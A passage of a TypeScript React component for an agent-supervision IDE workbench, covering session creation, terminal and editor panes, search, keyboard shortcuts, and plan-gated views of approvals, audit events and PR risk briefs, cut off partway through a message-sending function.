import { FormEvent, useCallback, useEffect, useMemo, useRef, useState } from "react";
import type { ReactNode } from "react";
import { ChevronLeft, ChevronRight, Lock, MessageCircle, RefreshCw } from "lucide-react";
import { useAction, useConvex, useMutation, useQuery } from "convex/react";
import { api as convexApi } from "../lib/convexApi";
import { FileTypeIcon } from "./FileTypeIcon";
import { ApiError, api, type ReviewRubric } from "../api/client";
import { RemediationRunPanel } from "./RemediationRunPanel";
import { RemediationHistory } from "./RemediationHistory";
import { RubricCard } from "./workbench/RubricCard";
import { ReviewRunPanel } from "./workbench/ReviewRunPanel";
import { SteerToSafetyButton, ReviewBatchPanel } from "./workbench/SteerToSafety";
import { navigateRoute } from "../routeNav";

import { filesStore } from "../stores/filesStore";
import { sessionsStore, setSessions } from "../stores/sessionsStore";
import {
  terminalsStore,
  setTerminalPaneVisible,
  setTerminalPaneMaximized,
  PANE_VISIBLE_KEY,
} from "../stores/terminalsStore";
import { workbenchesStore } from "../stores/workbenchesStore";
import { useWorkbenchLayout } from "../hooks/useWorkbenchLayout";
import { renderSafeMarkdown } from "../markdown";

import type {
  AgentSession,
  ApprovalRequest,
  CommandEvent,
  FileEntry,
  FileReadPayload,
  FileSearchPayload,
  FileSearchResult,
  HealthPayload,
  WorkbenchSnapshot,
} from "../types";
import { BrowseFolderButton } from "./BrowseFolderButton";
import { ChatList } from "./ChatList";
import { ChatPanel } from "./ChatPanel";
import { CmdKOverlay } from "./CmdKOverlay";
import { EditorStatusBar } from "./EditorStatusBar";
import { FileEditor } from "./FileEditor";
import type { MeterEvent } from "../hooks/useEditorEdit";
import { EditorView } from "@codemirror/view";
import { TerminalPane } from "./TerminalPane";
import { chatsStore, useChatsStore } from "../stores/chatsStore";
import { restoreContinuityTerminals } from "../services/terminalContinuity";
import { openPath } from "@tauri-apps/plugin-opener";
import { SettingsModal } from "./SettingsModal";
import { settingsStore, loadSettings, checkAgentUpdates } from "../stores/settingsStore";
import { useEntitlements } from "../hooks/useEntitlements";
import type { MaxMode } from "./workbench/types";
import { ActivityBar } from "./workbench/ActivityBar";
import { TerminalWorkspace } from "./workbench/TerminalWorkspace";
import { SessionRail } from "./workbench/SessionRail";
import { EditorFrame } from "./workbench/EditorFrame";
import { WelcomeView } from "./workbench/WelcomeView";
import { BrowserPane } from "./workbench/BrowserPane";
import { navigateBrowser } from "../stores/browserStore";
import { hideNative } from "../services/nativeBrowser";

type Surface = "explorer" | "search" | "sessions" | "agents" | "workspaces";
type InspectorTab = "context" | "security" | "review" | "browser";

// Files that render as web content open in the inspector Browser tab (preview)
// alongside the editor, instead of editor-only. Everything else opens as code.
function isWebPreviewable(path: string): boolean {
  return /\.(html?|svg)$/i.test(path);
}
type PaneId = "chat" | string;
type SearchMode = "files" | "text";

interface WorkbenchViewProps {
  active?: boolean;
}

interface OpenFileTab {
  id: string;
  path: string;
  rootPath: string;
  projectId: string | null;
  content: string;
  savedContent: string;
  status: string;
  restricted: boolean;
  restrictedReason?: string | null;
  loading: boolean;
  error: string | null;
  pendingLine?: number | null;
}

const PROVIDER_BY_AGENT: Record<string, "anthropic" | "openai" | "xai" | undefined> = {
  "Claude Code": "anthropic",
  Codex: "openai",
  Grok: "xai",
};

// Users frequently paste paths with surrounding quotes (drag-from-Finder
// shell-escape, copy-with-quotes from terminal output, etc.). The backend
// requires path.isAbsolute() which rejects "'/Users/..." — strip the
// outer quote chars before validation so the user gets the same result
// as if they'd typed the path bare.
function sanitizePath(input: string): string {
  return input.trim().replace(/^['"]+|['"]+$/g, "");
}

/**
 * Move the cursor + scroll an editor to a 1-based line, clamped to the doc.
 * Exported for unit testing.
 */
export function scrollEditorToLine(view: EditorView, line: number): void {
  const lineCount = view.state.doc.lines;
  const target = Math.max(1, Math.min(line, lineCount));
  const pos = view.state.doc.line(target).from;
  view.dispatch({
    selection: { anchor: pos, head: pos },
    effects: EditorView.scrollIntoView(pos, { y: "center" }),
  });
}

export function WorkbenchView({ active = true }: WorkbenchViewProps = {}) {
  const sessions = sessionsStore.useStore();
  const terminals = terminalsStore.useStore();
  const workbenches = workbenchesStore.useStore();
  const files = filesStore.useStore();

  // Moved up from below so it can be referenced by session-scoped useQuery
  // calls (getRelatedToSession, tool-call filter) before any other hooks.
  const activeSession = useMemo(
    () =>
      sessions.items.find((session) => session.id === sessions.activeId) ||
      sessions.items[0] ||
      null,
    [sessions.items, sessions.activeId]
  );

  // Spec 5.1 PR 3 — workbench bootstrap is now a reactive Convex query.
  // The legacy /api/workbench REST route is 410'd in this PR; the snapshot
  // (workbench layout + agents + sessions + terminals + chats + settings)
  // arrives via convexApi.workbench.queries.snapshot and reactively
  // re-renders on any backing mutation. Per
  // [[feedback-spec5-pr54-64-review-patterns]] #14 we MERGE the snapshot
  // into local state (sessions/snapshot) rather than wholesale-replace,
  // so optimistic edits + live SSE state survive the reactive update.
  const convexSnapshot = useQuery(convexApi.workbench.queries.snapshot, {});
  // Spec 5.1 PR3 — session create mutation; replaces the legacy
  // /api/sessions POST that was removed in the paywall migration. The
  // mutation returns {id, sessionId, title, agentName, status} from
  // convex:api.sessions.mutations.create.
  const createSessionMutation = useMutation(convexApi.sessions.mutations.create);
  // Spec 5.1 PR 5 — approval resolution via Convex mutation; replaces
  // POST /api/approvals/:id/decision (REST route 410'd).
  const resolveApprovalMut = useMutation((convexApi as any).approvals.mutations.resolve);
  // Spec 5.1 PR 6 — /api/command-check migrated to Convex query.
  // commandCheck is one-shot (not reactive), so use the imperative
  // client via useConvex() rather than useQuery. Per
  // [[feedback-spec5-pr54-64-review-patterns]] #11 the legacy REST
  // route was `requireBaseOrSecurity`; the Convex query gates on the
  // `base` plan, preserving access for every signed-in plan member.
  const convex = useConvex();

  // RC-2: Inspector tabs wired to live Convex data.
  // All four queries are plan:"security"-gated; useEntitlements() is
  // consulted to skip the query args (pass `skip` sentinel) for Base-only
  // orgs, avoiding a guaranteed 402/ConvexError from the server.  Even
  // when gated, a transient undefined return (Convex loading / 402) is
  // treated as an empty list — the workbench never crashes.
  const entitlements = useEntitlements();
  const hasSecurityPlan =
    entitlements.kind === "ready" && (entitlements as { hasSecurity?: boolean }).hasSecurity;
  // Pro+ features (PR risk briefs, audit export) gate on hasPro — true for
  // both Pro and Ultra Security orgs. Approvals + memory graph stay security.
  const hasProPlan = entitlements.kind === "ready" && (entitlements as { hasPro?: boolean }).hasPro;

  // pending approvals — drives the Security tab badge + ApprovalList.
  const convexPendingApprovals = useQuery(
    (convexApi as any).approvals.queries.pending,
    hasSecurityPlan ? {} : "skip"
  ) as Array<Record<string, unknown>> | undefined;

  // recent audit events — drives CommandList (Tool calls).
  const convexAuditEvents = useQuery(
    (convexApi as any).audit.queries.recent,
    hasProPlan ? { limit: 50 } : "skip"
  ) as Array<Record<string, unknown>> | undefined;

  // memory graph — drives MemoryNotesPanel (Context > Security memory).
  // Session-scoped: use getRelatedToSession so only entities observed in
  // the active session are loaded (avoids pulling the full org graph).
  // When there is no active session yet, pass "skip" so Convex does not
  // fire a query with an empty/invalid sessionId.
  const convexMemoryGraph = useQuery(
    (convexApi as any).memory.queries.getRelatedToSession,
    hasSecurityPlan && activeSession?.sessionId ? { sessionId: activeSession.sessionId } : "skip"
  ) as { entities?: Array<Record<string, unknown>> } | undefined;

  // PR risk briefs — drives MiniList (Review > PR risk). Populated on demand
  // by the "Scan branch" trigger (Wave 1e); re-fires reactively after a scan.
  const convexRiskBriefs = useQuery(
    (convexApi as any).risk.queries.recentBriefs,
    hasProPlan ? { limit: 20 } : "skip"
  ) as { briefs?: Array<Record<string, unknown>> } | undefined;

  // PR-risk activation (Wave 1e): the existing public analyzePr action, bound
  // for the Scan-branch trigger in PrRiskCard. recentBriefs (above) re-fires
  // reactively after a successful scan, so no manual refetch is needed.
  const analyzePr = useAction((convexApi as any).risk.actions.analyzePr) as (args: {
    prUrl: string;
    changedFiles: string[];
    diff: string;
  }) => Promise<unknown>;

  // ── Inspector data — mapped from Convex rows ──────────────────────────────

  // Approvals: Convex rows have {_id, command, status, requestedBy, reason,
  // createdAt, ...}. ApprovalList reads: id, severity, status, title/command,
  // requestedAction/reason.
  const liveApprovals: Array<Record<string, unknown>> = (convexPendingApprovals ?? []).map(
    (row) => ({
      ...row,
      id: row._id ?? row.id,
      title: row.command,
      status: row.status ?? "pending",
      severity: (row.context as Record<string, unknown> | undefined)?.severity ?? "medium",
      requestedAction: row.reason ?? row.command,
    })
  );

  // Audit events: Convex rows have {id/_id, type, subject, details, at}.
  // CommandEvent reads: id, type, command, decision, reason, recordedAt.
  const liveCommandAudit: CommandEvent[] = (convexAuditEvents ?? [])
    .filter((row) => {
      // Fix 3: session-scope — only show events for the active session.
      // Client-side filter keeps the {limit:50} fetch but prevents other
      // sessions'/users' events from leaking into the Tool calls card.
      const d = (row.details as Record<string, unknown> | undefined) ?? {};
      const matchesSession = !activeSession?.sessionId || d.sessionId === activeSession.sessionId;
      // Only show terminal-family audit types.
      const isTerminalType = typeof row.type === "string" && row.type.startsWith("terminal.");
      return matchesSession && isTerminalType;
    })
    .slice(0, 8)
    .map((row) => {
      const d = (row.details as Record<string, unknown> | undefined) ?? {};
      return {
        ...d,
        id: String(row._id ?? row.id ?? ""),
        type: String(row.type ?? "audit"),
        // Fix 4: for egress rows the real command lives in details.command;
        // row.subject is "egress-violation" for those rows — prefer nested.
        command: String(d.command ?? row.subject ?? ""),
        decision: (d.decision as CommandEvent["decision"]) ?? undefined,
        reason: String(d.reason ?? ""),
        // Fix 1: NaN-safe date — typeof NaN === "number" so guard with
        // Number.isFinite before constructing a Date.
        recordedAt:
          typeof row.at === "number" && Number.isFinite(row.at)
            ? new Date(row.at as number).toISOString()
            : undefined,
      } as CommandEvent;
    });

  // Memory graph entities → notes shape MemoryNotesPanel expects:
  // {id, title, type, summary, tags, backlinks}.
  const liveMemoryNotes: Array<Record<string, unknown>> = (convexMemoryGraph?.entities ?? []).map(
    (e) => ({
      id: e.id ?? e._id,
      title: e.name,
      type: e.type ?? "entity",
      summary: (e.metadata as Record<string, unknown> | undefined)?.summary ?? undefined,
      tags: [],
      backlinks: [],
    })
  );

  // PR risk briefs → MiniList shape: {id, title, name, reason/description}.
  const liveRiskBriefs: Array<Record<string, unknown>> = (convexRiskBriefs?.briefs ?? []).map(
    (b) => ({
      id: b.id,
      title: b.prUrl,
      name: b.prUrl,
      reason: b.summary,
      description: `Score: ${b.score}`,
    })
  );

  const [snapshot, setSnapshot] = useState<WorkbenchSnapshot | null>(null);
  const [health, setHealth] = useState<HealthPayload | null>(null);
  const [surface, setSurface] = useState<Surface>("sessions");
  const [inspectorTab, setInspectorTab] = useState<InspectorTab>("context");
  const [maxMode, setMaxMode] = useState<MaxMode>("none");
  const [chatVisible, setChatVisible] = useState<boolean>(false);
  // Whether the user has explicitly engaged a surface this session (opened a
  // terminal/chat/file/session/project). The home Welcome screen stays put
  // until this flips true — a restored project root or fallback session must
  // NOT pull the user off Welcome (that was the launch flicker). See
  // isEmptyState below.
  // Retained as a no-op setter only: the open-surface-based isEmptyState above
  // no longer needs a sticky "engaged" flag, but several call sites still call
  // setLeftHome(). The value itself is unused.
  const [, setLeftHome] = useState<boolean>(false);
  const {
    shellRef,
    sessionCollapsed,
    contextCollapsed,
    setSessionCollapsed,
    setContextCollapsed,
    splitterProps,
  } = useWorkbenchLayout();
  // Terminal pane visibility lives on the singleton terminalsStore (with
  // localStorage persistence for `paneVisible`) so it survives WorkbenchView
  // remounts within the same JS session — route switches into/out of the
  // Security Room, Tauri webview reopen with the process alive, StrictMode
  // double-mount, etc. Without this, every navigation back to the workbench
  // would reset the pane to closed even though the terminals were still
  // alive in the store and on the backend, and the user would have to
  // restart the app for them to reappear. The `terminals` const above
  // already subscribes to terminalsStore, so reading the same store again
  // here is a no-op — both selectors see the same snapshot.
  const terminalVisible = terminals.paneVisible;
  const terminalMaximized = terminals.paneMaximized;
  const setTerminalVisible = setTerminalPaneVisible;
  const [draftGoal, setDraftGoal] = useState(
    "Add password reset flow with JWT reset tokens, database migration, tests, and a PR reviewer brief."
  );
  const [draftRepo, setDraftRepo] = useState("");
  const [draftAgent, setDraftAgent] = useState("Codex");
  const [draftMode, setDraftMode] = useState("approval-gated");
  const [leftTab, setLeftTab] = useState<"chats" | "sessions">("chats");
  const [messageDraft, setMessageDraft] = useState("");
  const [modelOverride, setModelOverride] = useState("");
  const [rootDraft, setRootDraft] = useState("");
  const [projectNameDraft, setProjectNameDraft] = useState("");
  const [projectRootDraft, setProjectRootDraft] = useState("");
  const [projectPanelOpen, setProjectPanelOpen] = useState(false);
  const [customAgentPanelOpen, setCustomAgentPanelOpen] = useState(false);
  const [customAgent, setCustomAgent] = useState({ name: "", cmd: "", args: "", env: "" });
  const [commandDraft, setCommandDraft] = useState("");
  const [commandResult, setCommandResult] = useState<Record<string, unknown> | null>(null);
  const [error, setError] = useState<string | null>(null);
  const [treeEntries, setTreeEntries] = useState<Map<string, FileEntry[]>>(() => new Map());
  const [expandedDirs, setExpandedDirs] = useState<Set<string>>(() => new Set([""]));
  const [openFiles, setOpenFiles] = useState<OpenFileTab[]>([]);
  const [activePane, setActivePane] = useState<PaneId>("chat");
  // Editor UI state, keyed by file tab id. Kept outside OpenFileTab so
  // toggling wrap or moving the caret doesn't dirty the file record (which
  // would re-trigger persistence paths that compare `content === savedContent`).
  const [editorWrap, setEditorWrap] = useState<Record<string, boolean>>({});
  const [editorCursor, setEditorCursor] = useState<
    Record<string, { line: number; col: number; selection: number }>
  >({});
  const [searchOpen, setSearchOpen] = useState(false);
  const [searchMode, setSearchMode] = useState<SearchMode>("files");
  const [searchQuery, setSearchQuery] = useState("");
  const [searchPayload, setSearchPayload] = useState<FileSearchPayload | null>(null);
  const [searchLoading, setSearchLoading] = useState(false);
  const [streaming, setStreaming] = useState(false);
  const [cmdKOpen, setCmdKOpen] = useState(false);
  // Track each open file's CodeMirror view BY PANE ID. All file panes stay
  // mounted (CSS-hidden via data-active), and each fires onReady once at
  // creation, so a single shared `activeEditorView` was always whichever editor
  // mounted LAST — Cmd-K and scroll-to-line then acted on the wrong file. Derive
  // the active view from `activePane`; bump a counter when a view registers so
  // the derived value re-renders the instant an editor becomes ready.
  const editorViewsRef = useRef<Map<string, EditorView>>(new Map());
  const [, setEditorViewsTick] = useState(0);
  const registerEditorView = useCallback((fileId: string, view: EditorView | null) => {
    const map = editorViewsRef.current;
    if (view) map.set(fileId, view);
    else map.delete(fileId);
    setEditorViewsTick((n) => n + 1);
  }, []);
  // Drop views for files no longer open — covers the single-tab close AND the
  // bulk-close helpers (Close all/others/to-right/saved go through
  // closeFilesMatching, which only filters openFiles) so closed CodeMirror
  // views/documents don't stay referenced for the component's lifetime.
  useEffect(() => {
    const openIds = new Set(openFiles.map((f) => f.id));
    const map = editorViewsRef.current;
    let changed = false;
    for (const id of [...map.keys()]) {
      if (!openIds.has(id)) {
        map.delete(id);
        changed = true;
      }
    }
    if (changed) setEditorViewsTick((n) => n + 1);
  }, [openFiles]);
  const activeEditorView: EditorView | null =
    typeof activePane === "string" && activePane !== "chat"
      ? (editorViewsRef.current.get(activePane) ?? null)
      : null;
  const [lastMeter, setLastMeter] = useState<MeterEvent | null>(null);
  const [settingsOpen, setSettingsOpen] = useState(false);
  const settingsState = settingsStore.useStore();
  const activeChatAbort = useRef<AbortController | null>(null);

  // Spec 5.1 PR 3 — adapt the reactive Convex snapshot into the legacy
  // WorkbenchSnapshot shape WorkbenchView's downstream rendering reads.
  // The Convex snapshot covers workbench/agents/sessions/chats/settings;
  // legacy fields (commandAudit, approvals, guardrails, memoryGraph,
  // prRisks) default to undefined here so the existing `|| []` defaults
  // in the inspector hold.
  //
  // C73-6 (P2 — DEFERRED to PR4/PR5/PR6, scheduled by spec5.1 migration
  // plan): the inspector tabs that consume those fields will be cut
  // over to their dedicated Convex hooks as their queries land:
  //   - commandAudit  → api.audit.queries.recent (Spec 5.1 PR4)
  //   - approvals     → api.approvals.queries.list (Spec 5.1 PR5)
  //   - memoryGraph   → api.memory.queries.readGraph (already in PR1)
  //   - prRisks       → api.risk.queries.recentBriefs (in PR2 — wire in
  //                     follow-up since the inspector still reads
  //                     legacy shape today)
  // During this PR's window those panels render the existing empty
  // states; no functional regression vs the legacy paywall-deprecated
  // buildWorkspacePayload (which itself was being migrated). User-
  // visible impact is bounded — see migration plan tasks for cutover.
  //
  // Per [[feedback-spec5-pr54-64-review-patterns]] #14 we MERGE — the
  // local sessions store is updated only on first Convex hydration and
  // when the Convex list grows/shrinks; we never wholesale-replace the
  // optimistic state already in sessionsStore.
  useEffect(() => {
    if (!convexSnapshot) return;
    // Project into WorkbenchSnapshot shape so callers reading
    // snapshot?.contextFiles etc. keep working unchanged.
    const projected: WorkbenchSnapshot = {
      workspace: {
        activeSessionId: null,
        openSessions: convexSnapshot.sessions.length,
      },
      sessions: convexSnapshot.sessions.map((s: any) => ({
        id: s.id,
        sessionId: s.sessionId,
        title: s.title,
        agent: s.agentName,
        status: s.status,
        createdAt: s.createdAt,
      })) as AgentSession[],
    };
    setSnapshot(projected);
    // G73-2 / C73-4: treat the Convex snapshot as source of truth for
    // any non-optimistic row. The previous merge kept every prior store
    // entry — so a session soft-deleted in another tab via
    // sessions.mutations.remove never disappeared in this tab, since
    // the deleted row is just missing from convexSessions and the
    // merger only ADDED, never removed.
    //
    // Optimistic rows (status: "draft" or id prefix "optimistic-") are
    // preserved so an in-flight create can stay rendered before the
    // first snapshot tick re-includes it under its Convex id.
    const convexSessions = projected.sessions || [];
    sessionsStore.setState((current) => {
      const byId = new Map<string, AgentSession>();
      // 1. Keep optimistic/draft items still in flight.
      for (const s of current.items) {
        if (s.status === "draft" || s.id.startsWith("optimistic-")) {
          byId.set(s.id, s);
        }
      }
      // 2. Upsert Convex rows; existing optimistic data on the same id
      //    layers under the Convex row so client-only fields (goal,
      //    repository) survive.
      for (const s of convexSessions) {
        const existing = byId.get(s.id);
        byId.set(s.id, existing ? { ...existing, ...s } : s);
      }
      return {
        ...current,
        items: Array.from(byId.values()),
        loading: false,
        error: null,
      };
    });
    // Note: the runtime agents catalog (with cmd/args/env) is sourced
    // from api.getAgents() in refresh() above. The convexSnapshot.agents
    // list is the admin-managed directory and is intentionally NOT
    // written into terminalsStore here — both lists coexist until the
    // legacy /api/agents POST/DELETE surface migrates in a later PR.
  }, [convexSnapshot]);

  // On mount: load workbench state, then restore previous terminals.
  // Sequencing restore after refresh() avoids a race where refresh()'s
  // terminalsStore.setState({ terminals: liveTerminals }) snapshot (taken
  // before the restore POSTs land on the server) would overwrite sessions
  // that restoreContinuityTerminals() just appended — causing tabs to vanish.
  //
  // Skip reattach when the store already has rows: WorkbenchView can remount
  // within the same JS session (route switch, Tauri window reopen with process
  // alive). The store is a module-level singleton that survives remounts;
  // the restore service also has id-based guards as a second layer.
  useEffect(() => {
    let cancelled = false;
    void (async () => {
      await refresh();
      if (cancelled) return;
      const activeWorkbenchId = workbenchesStore.getSnapshot().activeId || "wb-default";
      const hasActiveTerminals = () =>
        terminalsStore
          .getSnapshot()
          .terminals.some(
            (terminal) => (terminal.workbenchId || "wb-default") === activeWorkbenchId
          );
      // If the store already has terminals (e.g. this is a remount within
      // the same JS session — Tauri reopen, route switch back from the
      // Security Room, StrictMode double-mount, etc.), surface them
      // immediately UNLESS the user explicitly closed the pane in this
      // browser profile. The smoke checklist promises an explicit close
      // survives Security Room navigation; unconditionally force-opening
      // would break that contract by overriding `paneVisible=false` from
      // localStorage on every mount.
      let userClosedPane = false;
      try {
        userClosedPane = localStorage.getItem(PANE_VISIBLE_KEY) === "false";
      } catch {
        /* hardened/private-mode storage: fall through to "not closed" */
      }
      if (hasActiveTerminals()) {
        if (!userClosedPane) setTerminalVisible(true);
        return;
      }
      const restored = await restoreContinuityTerminals();
      if (cancelled) return;
      if (restored > 0 && hasActiveTerminals() && !userClosedPane) {
        setTerminalVisible(true);
      }
    })();
    return () => {
      cancelled = true;
    };
  }, []);

  useEffect(() => {
    void (async () => {
      await loadSettings();
      // Fire-and-forget. Server-side 24h throttle decides whether to actually re-check.
      try {
        await checkAgentUpdates(false);
      } catch {
        /* surfaced via snapshot status */
      }
    })();
  }, []);

  useEffect(() => {
    if (!files.rootPath) return;
    setExpandedDirs(new Set([""]));
    setTreeEntries(new Map());
    void loadTree("");
  }, [files.rootPath, files.selectedProjectId]);

  useEffect(() => {
    if (!searchOpen || !files.rootPath) return;
    const timer = setTimeout(() => void runSearch(), 160);
    return () => clearTimeout(timer);
  }, [searchOpen, searchMode, searchQuery, files.rootPath, files.selectedProjectId]);

  // Global IDE keymap — mirrors what files.js wired in the legacy web app.
  // We deliberately let CodeMirror swallow Cmd+S inside its own surface
  // (the editor extension already binds Mod-s with Prec.highest); this
  // handler only fires when the editor doesn't claim it, which lets Cmd+S
  // also save when the user has the chat composer or rail focused.
  useEffect(() => {
    function isEditorTarget(target: EventTarget | null): boolean {
      if (!(target instanceof Element)) return false;
      return Boolean(target.closest(".cm-editor"));
    }
    function onKey(event: KeyboardEvent) {
      const mod = event.metaKey || event.ctrlKey;
      if (!mod) return;
      const key = event.key.toLowerCase();
      // Cmd+P → open files palette. Cmd+Shift+P is reserved by browsers
      // for the command palette and we don't override it.
      if (key === "p" && !event.shiftKey) {
        event.preventDefault();
        openSearch("files");
        return;
      }
      // Cmd+Shift+F → open text palette (VS Code / Cursor convention).
      if (key === "f" && event.shiftKey) {
        // Don't steal Cmd+F when the editor has focus — CodeMirror's
        // own search panel is more useful there than our cross-file one.
        if (isEditorTarget(event.target)) return;
        event.preventDefault();
        openSearch("text");
        return;
      }
      // Cmd+S → save the active file even if focus is elsewhere. The
      // editor's own Mod-s binding fires first when it has focus, so we
      // only reach here for chat/rail/etc. focus.
      if (key === "s" && !event.shiftKey) {
        const id = typeof activePane === "string" && activePane !== "chat" ? activePane : null;
        const tab = id ? openFiles.find((file) => file.id === id) : null;
        if (tab && tab.content !== tab.savedContent && !tab.loading) {
          event.preventDefault();
          void saveFile(tab);
        }
        return;
      }
      // Cmd+W → close the active file tab (never closes Chat).
      if (key === "w" && !event.shiftKey) {
        if (activePane === "chat") return;
        if (typeof activePane !== "string") return;
        event.preventDefault();
        closeFile(activePane);
        return;
      }
      // Cmd+K → open inline AI edit overlay for the active file.
      if (key === "k" && !event.shiftKey) {
        event.preventDefault();
        const id = typeof activePane === "string" && activePane !== "chat" ? activePane : null;
        const tab = id ? openFiles.find((file) => file.id === id) : null;
        if (tab && activeEditorView) setCmdKOpen(true);
        return;
      }
    }
    window.addEventListener("keydown", onKey);
    return () => window.removeEventListener("keydown", onKey);
    // files.rootPath / selectedProjectId end up in this dep list because
    // openSearch closes over activeRoot, which is derived from them. Without
    // those, pressing Cmd+P right after activating a folder would still
    // see activeRoot=null in the captured handler and show a stray toast.
  }, [activePane, openFiles, activeEditorView, files.rootPath, files.selectedProjectId]);

  // Escape closes the search palette regardless of focus. The input's own
  // onKeyDown only fires while that input is focused, which it isn't when the
  // palette was opened from the rail button or after a result row took focus.
  useEffect(() => {
    if (!searchOpen) return;
    const onEsc = (event: KeyboardEvent) => {
      // Don't close on an Escape a higher-priority overlay already handled
      // (a nested dropdown/select/inline editor that called preventDefault) —
      // this is a global window listener, so without the guard it would close
      // the palette out from under whatever the Escape was actually for.
      if (event.defaultPrevented) return;
      if (event.key === "Escape") setSearchOpen(false);
    };
    window.addEventListener("keydown", onEsc);
    return () => window.removeEventListener("keydown", onEsc);
  }, [searchOpen]);

  async function refresh() {
    sessionsStore.setState({ loading: true, error: null });
    setError(null);
    try {
      setHealth(await api.health());
    } catch {
      setHealth({
        ok: false,
        service: "agentguard-mvp",
        persisted: { sessions: 0, approvals: 0, commandEvents: 0 },
      });
    }
    try {
      // Spec 5.1 PR 3 — workbench bootstrap (workbench layout + sessions
      // + chats + settings) is now provided by the reactive convexSnapshot
      // query at module top. We fetch only the surfaces that remain
      // bucket B in this PR: containers (multi-workbench list, no Convex
      // equivalent yet), live terminals (host PTYs), projects (host fs),
      // and the runtime agents catalog (terminalEngine.listAgents()
      // returns the bundled CLI binaries + user-installed customs with
      // cmd/args/env — the Convex agents.catalog is the admin-managed
      // directory, the runtime catalog is what the agent picker uses).
      const [containers, agents, liveTerminals, projects] = await Promise.all([
        api.getWorkbenches(),
        api.getAgents(),
        api.getTerminals(),
        api.getProjects().catch(() => ({ projects: [], recentFolders: [] })),
      ]);
      workbenchesStore.setState((current) => ({
        ...current,
        items: containers,
        activeId:
          current.activeId && containers.some((container) => container.id === current.activeId)
            ? current.activeId
            : containers[0]?.id || "wb-default",
        loading: false,
        error: null,
      }));
      // Per [[feedback-spec5-pr54-64-review-patterns]] #14 — terminals
      // and agents are source-of-truth here (live PTY metadata + runtime
      // CLI catalog from terminalEngine). Spec 5.1 PR 3: the Convex
      // snapshot's agent catalog is the admin-managed directory; the
      // runtime listAgents() is what the agent picker resolves cmd/args
      // against. Both coexist.
      terminalsStore.setState({
        agents,
        terminals: liveTerminals,
        activeId: liveTerminals[0]?.id || null,
        spawning: false,
        error: null,
      });

      const saved = readSavedRoot();
      const savedProject = saved?.projectId
        ? projects.projects.find((project) => project.id === saved.projectId)
        : null;
      const fallbackProject = projects.projects[0] || null;
      const fallbackRecent = projects.recentFolders[0] || null;
      const selectedProject = savedProject || fallbackProject;
      const rootPath =
        saved?.rootPath || selectedProject?.rootPath || fallbackRecent?.rootPath || null;
      const selectedProjectId =
        selectedProject && selectedProject.rootPath === rootPath ? selectedProject.id : null;

      filesStore.setState((current) => ({
        ...current,
        projects: projects.projects,
        recentFolders: projects.recentFolders,
        rootPath,
        rootName: selectedProject?.name || fallbackRecent?.displayName || rootPath,
        selectedProjectId,
        error: null,
      }));
      if (!draftRepo && selectedProject)
        setDraftRepo(selectedProject.name || selectedProject.rootPath);
    } catch (refreshError) {
      const message =
        refreshError instanceof Error ? refreshError.message : "Failed to load workbench";
      sessionsStore.setState({ loading: false, error: message });
      setError(message);
    }
  }

  // activeSession is defined near the top of the component (before the
  // session-scoped useQuery calls that depend on it).

  const shellClass = [
    "workbench-shell",
    sessionCollapsed ? "session-collapsed" : "",
    contextCollapsed ? "context-collapsed" : "",
  ]
    .filter(Boolean)
    .join(" ");
  const runtimeLabel = health ? (health.ok ? "Online" : "Offline") : "Checking";
  const activeRoot = files.rootPath
    ? {
        projectId: files.selectedProjectId,
        rootPath: files.rootPath,
        name: files.rootName || files.rootPath,
      }
    : null;
  const activeFile = openFiles.find((file) => file.id === activePane) || null;

  // When a file is opened with a target line (e.g. from a double-clicked
  // src/x.js:42 tag), jump once the active editor exists AND content has
  // loaded. rAF defers past CodeMirror's controlled-value doc sync.
  useEffect(() => {
    if (!activeEditorView || !activeFile) return;
    if (activeFile.loading || activeFile.pendingLine == null) return;
    const line = activeFile.pendingLine;
    const id = activeFile.id;
    const raf = requestAnimationFrame(() => {
      scrollEditorToLine(activeEditorView, line);
      patchOpenFile(id, { pendingLine: null });
    });
    return () => cancelAnimationFrame(raf);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [activeEditorView, activePane, activeFile?.pendingLine, activeFile?.loading]);

  const activeChatId = useChatsStore((s) => s.activeId);
  const openChats = useChatsStore((s) => s.openChats);
  const activeChat = useChatsStore((s) =>
    s.activeId ? (s.chats.find((c) => c.id === s.activeId) ?? null) : null
  );
  // In chat mode the Security badge alerts on the active chat's PENDING
  // approvals — the actionable cards live in the chat transcript (ChatPanel),
  // while chat.approvals is the resolved policy-decision history. In terminal
  // mode the badge stays on liveApprovals.
  const pendingApprovalsMap = useChatsStore((s) => s.pendingApprovals);
  const chatPending: ApprovalRequest[] = activeChat
    ? (pendingApprovalsMap.get(activeChat.id) ?? [])
    : [];

  // Show the Welcome home screen whenever nothing is open — no chat panes in
  // the grid, no editor tabs, no terminal overlay. This replaces the legacy
  // "Create a guarded agent session" body as the empty/default view: closing
  // the last chat returns you to Welcome. We key on the actual open surfaces
  // (not a sticky leftHome flag or a restored project root), so a restored root
  // doesn't flip Welcome away on launch, and continuity-restored terminals
  // (terminalVisible) correctly show the terminal instead of Welcome.
  const isEmptyState = !terminalVisible && openChats.length === 0 && openFiles.length === 0;

  async function createSession(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
    if (!draftGoal.trim()) return;
    setError(null);
    try {
      // Spec 5.1 PR3 — session create now lives in Convex. The legacy
      // /api/sessions POST was removed in the paywall migration; this
      // path produces the same {id, sessionId, title, agentName, status}
      // shape and the reactive convexSnapshot will refresh the sessions
      // list on the next round-trip.
      // C73-3: persist repository + mode so the session re-hydrates
      // with the same project + mode on reload / other clients.
      const repoForSession = draftRepo.trim() || files.rootName || "local/repo";
      const created = await createSessionMutation({
        title: draftGoal.trim(),
        agentName: draftAgent,
        repository: repoForSession,
        mode: draftMode,
      });
      // Project into the legacy AgentSession shape and prepend
      // optimistically. The reactive snapshot will reconcile this id
      // (Convex Id) into the merged list on the next snapshot tick;
      // per [[feedback-spec5-pr54-64-review-patterns]] #14 the merge
      // is by id-upsert, so this optimistic row won't be wiped.
      const optimistic: AgentSession = {
        id: created.id,
        sessionId: created.sessionId,
        title: created.title,
        agent: created.agentName,
        goal: draftGoal.trim(),
        repository: repoForSession,
        mode: draftMode,
        status: created.status,
        // G73-6: createdAt is a number (ms-since-epoch) per Convex schema.
        // The legacy ISO-string write caused sort/format errors when the
        // optimistic row sat alongside Convex rows.
        createdAt: Date.now(),
      } as AgentSession;
      setSessions([optimistic, ...sessions.items]);
      sessionsStore.setState({ activeId: optimistic.id });
      setLeftHome(true);
      setDraftGoal("");
    } catch (createError) {
      setError(createError instanceof Error ? createError.message : "Could not create session");
    }
  }

  async function sendMessage(event: FormEvent<HTMLFormElement>) {
    event.preventDefault();
